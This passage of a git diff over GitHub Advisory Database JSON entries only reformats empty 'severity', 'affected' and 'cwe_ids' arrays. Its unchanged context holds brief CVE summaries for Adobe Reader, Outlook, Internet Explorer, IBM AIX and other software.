b/advisories/unreviewed/2022/05/GHSA-6m72-54p2-ff56/GHSA-6m72-54p2-ff56.json @@ -7,12 +7,8 @@ "CVE-2015-7616" ], "details": "The ANVerifyComments method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6q3f-fc2p-9rh3/GHSA-6q3f-fc2p-9rh3.json b/advisories/unreviewed/2022/05/GHSA-6q3f-fc2p-9rh3/GHSA-6q3f-fc2p-9rh3.json index 72882bd88af..b55f02912ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-6q3f-fc2p-9rh3/GHSA-6q3f-fc2p-9rh3.json +++ b/advisories/unreviewed/2022/05/GHSA-6q3f-fc2p-9rh3/GHSA-6q3f-fc2p-9rh3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6q84-cfgm-7vcv/GHSA-6q84-cfgm-7vcv.json b/advisories/unreviewed/2022/05/GHSA-6q84-cfgm-7vcv/GHSA-6q84-cfgm-7vcv.json index f9b102fec59..3b1d3c4c293 100644 --- a/advisories/unreviewed/2022/05/GHSA-6q84-cfgm-7vcv/GHSA-6q84-cfgm-7vcv.json +++ b/advisories/unreviewed/2022/05/GHSA-6q84-cfgm-7vcv/GHSA-6q84-cfgm-7vcv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6qr8-95p4-28hw/GHSA-6qr8-95p4-28hw.json b/advisories/unreviewed/2022/05/GHSA-6qr8-95p4-28hw/GHSA-6qr8-95p4-28hw.json index a6e170c546c..63bc8b2bf43 100644 --- a/advisories/unreviewed/2022/05/GHSA-6qr8-95p4-28hw/GHSA-6qr8-95p4-28hw.json +++ b/advisories/unreviewed/2022/05/GHSA-6qr8-95p4-28hw/GHSA-6qr8-95p4-28hw.json @@ -7,12 +7,8 @@ "CVE-2013-3905" ], "details": "Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka \"S/MIME AIA Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6v2j-64px-rm5x/GHSA-6v2j-64px-rm5x.json b/advisories/unreviewed/2022/05/GHSA-6v2j-64px-rm5x/GHSA-6v2j-64px-rm5x.json index ac09cc21224..8261088e9f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-6v2j-64px-rm5x/GHSA-6v2j-64px-rm5x.json +++ b/advisories/unreviewed/2022/05/GHSA-6v2j-64px-rm5x/GHSA-6v2j-64px-rm5x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6v78-589f-h6c4/GHSA-6v78-589f-h6c4.json b/advisories/unreviewed/2022/05/GHSA-6v78-589f-h6c4/GHSA-6v78-589f-h6c4.json index a1f33c8f3de..50db3ffb7c6 100644 --- a/advisories/unreviewed/2022/05/GHSA-6v78-589f-h6c4/GHSA-6v78-589f-h6c4.json +++ b/advisories/unreviewed/2022/05/GHSA-6v78-589f-h6c4/GHSA-6v78-589f-h6c4.json @@ -7,12 +7,8 @@ "CVE-2011-3696" ], "details": "60cycleCMS 2.5.2 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by post.php and certain other files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6vj2-4357-m3jx/GHSA-6vj2-4357-m3jx.json b/advisories/unreviewed/2022/05/GHSA-6vj2-4357-m3jx/GHSA-6vj2-4357-m3jx.json index f03f424015e..9ce0a34c960 100644 --- a/advisories/unreviewed/2022/05/GHSA-6vj2-4357-m3jx/GHSA-6vj2-4357-m3jx.json +++ b/advisories/unreviewed/2022/05/GHSA-6vj2-4357-m3jx/GHSA-6vj2-4357-m3jx.json @@ -7,12 +7,8 @@ "CVE-2015-6723" ], "details": "The ANTrustPropagateAll method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6vjp-wc2j-cvcc/GHSA-6vjp-wc2j-cvcc.json b/advisories/unreviewed/2022/05/GHSA-6vjp-wc2j-cvcc/GHSA-6vjp-wc2j-cvcc.json index 49c2680abef..51e4931de6c 100644 --- a/advisories/unreviewed/2022/05/GHSA-6vjp-wc2j-cvcc/GHSA-6vjp-wc2j-cvcc.json +++ b/advisories/unreviewed/2022/05/GHSA-6vjp-wc2j-cvcc/GHSA-6vjp-wc2j-cvcc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6wmr-jwhh-q9m7/GHSA-6wmr-jwhh-q9m7.json b/advisories/unreviewed/2022/05/GHSA-6wmr-jwhh-q9m7/GHSA-6wmr-jwhh-q9m7.json index 64f5d9988a2..fecfd0f5bb3 100644 --- a/advisories/unreviewed/2022/05/GHSA-6wmr-jwhh-q9m7/GHSA-6wmr-jwhh-q9m7.json +++ b/advisories/unreviewed/2022/05/GHSA-6wmr-jwhh-q9m7/GHSA-6wmr-jwhh-q9m7.json @@ -7,12 +7,8 @@ "CVE-2015-7617" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code by leveraging improper EScript exception handling, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-6691, CVE-2015-7615, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6wp5-2wg9-x2pr/GHSA-6wp5-2wg9-x2pr.json b/advisories/unreviewed/2022/05/GHSA-6wp5-2wg9-x2pr/GHSA-6wp5-2wg9-x2pr.json index d14c25ec269..8c8dfb11230 100644 --- a/advisories/unreviewed/2022/05/GHSA-6wp5-2wg9-x2pr/GHSA-6wp5-2wg9-x2pr.json +++ b/advisories/unreviewed/2022/05/GHSA-6wp5-2wg9-x2pr/GHSA-6wp5-2wg9-x2pr.json @@ -7,12 +7,8 @@ "CVE-2015-5110" ], "details": "Stack-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6xf7-p3jx-g67x/GHSA-6xf7-p3jx-g67x.json b/advisories/unreviewed/2022/05/GHSA-6xf7-p3jx-g67x/GHSA-6xf7-p3jx-g67x.json index 773935806ce..2de3b832b5f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6xf7-p3jx-g67x/GHSA-6xf7-p3jx-g67x.json +++ b/advisories/unreviewed/2022/05/GHSA-6xf7-p3jx-g67x/GHSA-6xf7-p3jx-g67x.json @@ -7,12 +7,8 @@ "CVE-2015-5115" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5087, CVE-2015-5094, CVE-2015-5100, CVE-2015-5102, CVE-2015-5103, and CVE-2015-5104.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6xq4-jfqg-x25m/GHSA-6xq4-jfqg-x25m.json b/advisories/unreviewed/2022/05/GHSA-6xq4-jfqg-x25m/GHSA-6xq4-jfqg-x25m.json index 521de249316..4f567aeebb5 100644 --- a/advisories/unreviewed/2022/05/GHSA-6xq4-jfqg-x25m/GHSA-6xq4-jfqg-x25m.json +++ b/advisories/unreviewed/2022/05/GHSA-6xq4-jfqg-x25m/GHSA-6xq4-jfqg-x25m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-72pf-6jrr-8vc2/GHSA-72pf-6jrr-8vc2.json b/advisories/unreviewed/2022/05/GHSA-72pf-6jrr-8vc2/GHSA-72pf-6jrr-8vc2.json index 49a88ffc295..803f5db3fdc 100644 --- a/advisories/unreviewed/2022/05/GHSA-72pf-6jrr-8vc2/GHSA-72pf-6jrr-8vc2.json +++ b/advisories/unreviewed/2022/05/GHSA-72pf-6jrr-8vc2/GHSA-72pf-6jrr-8vc2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-73cf-v5cj-5xh7/GHSA-73cf-v5cj-5xh7.json b/advisories/unreviewed/2022/05/GHSA-73cf-v5cj-5xh7/GHSA-73cf-v5cj-5xh7.json index 6167ef4b8ae..1fad8a5933b 100644 --- a/advisories/unreviewed/2022/05/GHSA-73cf-v5cj-5xh7/GHSA-73cf-v5cj-5xh7.json +++ b/advisories/unreviewed/2022/05/GHSA-73cf-v5cj-5xh7/GHSA-73cf-v5cj-5xh7.json @@ -7,12 +7,8 @@ "CVE-2013-2154" ], "details": "Stack-based buffer overflow in the XML Signature Reference functionality (xsec/dsig/DSIGReference.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via malformed XPointer expressions, probably related to the DSIGReference::getURIBaseTXFM function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-74w8-fgf9-wcw8/GHSA-74w8-fgf9-wcw8.json b/advisories/unreviewed/2022/05/GHSA-74w8-fgf9-wcw8/GHSA-74w8-fgf9-wcw8.json index 95e84ad962b..b274faf6b8d 100644 --- a/advisories/unreviewed/2022/05/GHSA-74w8-fgf9-wcw8/GHSA-74w8-fgf9-wcw8.json +++ b/advisories/unreviewed/2022/05/GHSA-74w8-fgf9-wcw8/GHSA-74w8-fgf9-wcw8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-74wc-vcgr-2498/GHSA-74wc-vcgr-2498.json b/advisories/unreviewed/2022/05/GHSA-74wc-vcgr-2498/GHSA-74wc-vcgr-2498.json index 66122f15f67..6ca9d9654c1 100644 --- a/advisories/unreviewed/2022/05/GHSA-74wc-vcgr-2498/GHSA-74wc-vcgr-2498.json +++ b/advisories/unreviewed/2022/05/GHSA-74wc-vcgr-2498/GHSA-74wc-vcgr-2498.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-75xv-v35m-f8rh/GHSA-75xv-v35m-f8rh.json b/advisories/unreviewed/2022/05/GHSA-75xv-v35m-f8rh/GHSA-75xv-v35m-f8rh.json index 3556c6c2b6e..a1687bd199c 100644 --- a/advisories/unreviewed/2022/05/GHSA-75xv-v35m-f8rh/GHSA-75xv-v35m-f8rh.json +++ b/advisories/unreviewed/2022/05/GHSA-75xv-v35m-f8rh/GHSA-75xv-v35m-f8rh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-763w-wjxp-rrxx/GHSA-763w-wjxp-rrxx.json b/advisories/unreviewed/2022/05/GHSA-763w-wjxp-rrxx/GHSA-763w-wjxp-rrxx.json index 8efb7aa9d0c..2d71b49869e 100644 --- a/advisories/unreviewed/2022/05/GHSA-763w-wjxp-rrxx/GHSA-763w-wjxp-rrxx.json +++ b/advisories/unreviewed/2022/05/GHSA-763w-wjxp-rrxx/GHSA-763w-wjxp-rrxx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-76fh-cw5x-fw6m/GHSA-76fh-cw5x-fw6m.json b/advisories/unreviewed/2022/05/GHSA-76fh-cw5x-fw6m/GHSA-76fh-cw5x-fw6m.json index fa3c4862b8f..855c2077d01 100644 --- a/advisories/unreviewed/2022/05/GHSA-76fh-cw5x-fw6m/GHSA-76fh-cw5x-fw6m.json +++ b/advisories/unreviewed/2022/05/GHSA-76fh-cw5x-fw6m/GHSA-76fh-cw5x-fw6m.json @@ -7,12 +7,8 @@ "CVE-2015-5103" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3095, CVE-2015-5087, CVE-2015-5094, CVE-2015-5100, CVE-2015-5102, CVE-2015-5104, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-76m2-pqh7-www3/GHSA-76m2-pqh7-www3.json b/advisories/unreviewed/2022/05/GHSA-76m2-pqh7-www3/GHSA-76m2-pqh7-www3.json index 0c1f8b9d359..8505019de05 100644 --- a/advisories/unreviewed/2022/05/GHSA-76m2-pqh7-www3/GHSA-76m2-pqh7-www3.json +++ b/advisories/unreviewed/2022/05/GHSA-76m2-pqh7-www3/GHSA-76m2-pqh7-www3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -131,9 +129,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-77pr-3jm2-qj7q/GHSA-77pr-3jm2-qj7q.json b/advisories/unreviewed/2022/05/GHSA-77pr-3jm2-qj7q/GHSA-77pr-3jm2-qj7q.json index cc115401413..565a706bdd8 100644 --- a/advisories/unreviewed/2022/05/GHSA-77pr-3jm2-qj7q/GHSA-77pr-3jm2-qj7q.json +++ b/advisories/unreviewed/2022/05/GHSA-77pr-3jm2-qj7q/GHSA-77pr-3jm2-qj7q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7965-5qv7-w6h8/GHSA-7965-5qv7-w6h8.json b/advisories/unreviewed/2022/05/GHSA-7965-5qv7-w6h8/GHSA-7965-5qv7-w6h8.json index 8fcf358e10b..a55acec4f0b 100644 --- a/advisories/unreviewed/2022/05/GHSA-7965-5qv7-w6h8/GHSA-7965-5qv7-w6h8.json +++ b/advisories/unreviewed/2022/05/GHSA-7965-5qv7-w6h8/GHSA-7965-5qv7-w6h8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-79fp-wvp2-r647/GHSA-79fp-wvp2-r647.json b/advisories/unreviewed/2022/05/GHSA-79fp-wvp2-r647/GHSA-79fp-wvp2-r647.json index 817c0950b42..2a9b90723cd 100644 --- a/advisories/unreviewed/2022/05/GHSA-79fp-wvp2-r647/GHSA-79fp-wvp2-r647.json +++ b/advisories/unreviewed/2022/05/GHSA-79fp-wvp2-r647/GHSA-79fp-wvp2-r647.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-79rh-2xp8-h9rm/GHSA-79rh-2xp8-h9rm.json b/advisories/unreviewed/2022/05/GHSA-79rh-2xp8-h9rm/GHSA-79rh-2xp8-h9rm.json index e25fcef707a..22007738167 100644 --- a/advisories/unreviewed/2022/05/GHSA-79rh-2xp8-h9rm/GHSA-79rh-2xp8-h9rm.json +++ b/advisories/unreviewed/2022/05/GHSA-79rh-2xp8-h9rm/GHSA-79rh-2xp8-h9rm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -79,9 +77,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7c3c-j4r2-p999/GHSA-7c3c-j4r2-p999.json b/advisories/unreviewed/2022/05/GHSA-7c3c-j4r2-p999/GHSA-7c3c-j4r2-p999.json index ce79d589d4b..d67ad6fdc6d 100644 --- a/advisories/unreviewed/2022/05/GHSA-7c3c-j4r2-p999/GHSA-7c3c-j4r2-p999.json +++ b/advisories/unreviewed/2022/05/GHSA-7c3c-j4r2-p999/GHSA-7c3c-j4r2-p999.json @@ -7,12 +7,8 @@ "CVE-2012-0723" ], "details": "The kernel in IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly implement the dupmsg system call, which allows local users to cause a denial of service (system crash) via a crafted application.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7c6j-j5mv-xxjc/GHSA-7c6j-j5mv-xxjc.json b/advisories/unreviewed/2022/05/GHSA-7c6j-j5mv-xxjc/GHSA-7c6j-j5mv-xxjc.json index d0a4141d7e3..cd1c7bd804a 100644 --- a/advisories/unreviewed/2022/05/GHSA-7c6j-j5mv-xxjc/GHSA-7c6j-j5mv-xxjc.json +++ b/advisories/unreviewed/2022/05/GHSA-7c6j-j5mv-xxjc/GHSA-7c6j-j5mv-xxjc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7f8r-jc6c-39f7/GHSA-7f8r-jc6c-39f7.json b/advisories/unreviewed/2022/05/GHSA-7f8r-jc6c-39f7/GHSA-7f8r-jc6c-39f7.json index 1a827bbec73..44700c92407 100644 --- a/advisories/unreviewed/2022/05/GHSA-7f8r-jc6c-39f7/GHSA-7f8r-jc6c-39f7.json +++ b/advisories/unreviewed/2022/05/GHSA-7f8r-jc6c-39f7/GHSA-7f8r-jc6c-39f7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7f9f-mr7p-v5pq/GHSA-7f9f-mr7p-v5pq.json b/advisories/unreviewed/2022/05/GHSA-7f9f-mr7p-v5pq/GHSA-7f9f-mr7p-v5pq.json index 07fe89a386f..4de4031c078 100644 --- a/advisories/unreviewed/2022/05/GHSA-7f9f-mr7p-v5pq/GHSA-7f9f-mr7p-v5pq.json +++ b/advisories/unreviewed/2022/05/GHSA-7f9f-mr7p-v5pq/GHSA-7f9f-mr7p-v5pq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7g52-xhrg-672g/GHSA-7g52-xhrg-672g.json b/advisories/unreviewed/2022/05/GHSA-7g52-xhrg-672g/GHSA-7g52-xhrg-672g.json index 7a17daa1fe6..ddd6f22146b 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g52-xhrg-672g/GHSA-7g52-xhrg-672g.json +++ b/advisories/unreviewed/2022/05/GHSA-7g52-xhrg-672g/GHSA-7g52-xhrg-672g.json @@ -7,12 +7,8 @@ "CVE-2015-6699" ], "details": "The addForegroundSprite function in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information from process memory via invalid arguments, a different vulnerability than CVE-2015-6697, CVE-2015-6700, CVE-2015-6701, CVE-2015-6702, CVE-2015-6703, and CVE-2015-6704.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7g7m-r288-q7h8/GHSA-7g7m-r288-q7h8.json b/advisories/unreviewed/2022/05/GHSA-7g7m-r288-q7h8/GHSA-7g7m-r288-q7h8.json index 9426b76ebc6..2c9421e7643 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g7m-r288-q7h8/GHSA-7g7m-r288-q7h8.json +++ b/advisories/unreviewed/2022/05/GHSA-7g7m-r288-q7h8/GHSA-7g7m-r288-q7h8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7gc4-xq62-m6wv/GHSA-7gc4-xq62-m6wv.json b/advisories/unreviewed/2022/05/GHSA-7gc4-xq62-m6wv/GHSA-7gc4-xq62-m6wv.json index 6b11beafb32..7a4c92612bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-7gc4-xq62-m6wv/GHSA-7gc4-xq62-m6wv.json +++ b/advisories/unreviewed/2022/05/GHSA-7gc4-xq62-m6wv/GHSA-7gc4-xq62-m6wv.json @@ -7,12 +7,8 @@ "CVE-2012-1872" ], "details": "Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka \"EUC-JP Character Encoding Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7hm7-46w7-2gvq/GHSA-7hm7-46w7-2gvq.json b/advisories/unreviewed/2022/05/GHSA-7hm7-46w7-2gvq/GHSA-7hm7-46w7-2gvq.json index 791eb1f66c2..14ec80ada41 100644 --- a/advisories/unreviewed/2022/05/GHSA-7hm7-46w7-2gvq/GHSA-7hm7-46w7-2gvq.json +++ b/advisories/unreviewed/2022/05/GHSA-7hm7-46w7-2gvq/GHSA-7hm7-46w7-2gvq.json @@ -7,12 +7,8 @@ "CVE-2015-4438" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4441, CVE-2015-4445, CVE-2015-4447, CVE-2015-4451, CVE-2015-4452, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7m3h-259r-858p/GHSA-7m3h-259r-858p.json b/advisories/unreviewed/2022/05/GHSA-7m3h-259r-858p/GHSA-7m3h-259r-858p.json index b37049138d9..3ee625ab9f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-7m3h-259r-858p/GHSA-7m3h-259r-858p.json +++ b/advisories/unreviewed/2022/05/GHSA-7m3h-259r-858p/GHSA-7m3h-259r-858p.json @@ -7,12 +7,8 @@ "CVE-2012-4833" ], "details": "fuser in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly restrict the -k option, which allows local users to kill arbitrary processes via a crafted command line.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7m45-rxr2-jh3h/GHSA-7m45-rxr2-jh3h.json b/advisories/unreviewed/2022/05/GHSA-7m45-rxr2-jh3h/GHSA-7m45-rxr2-jh3h.json index 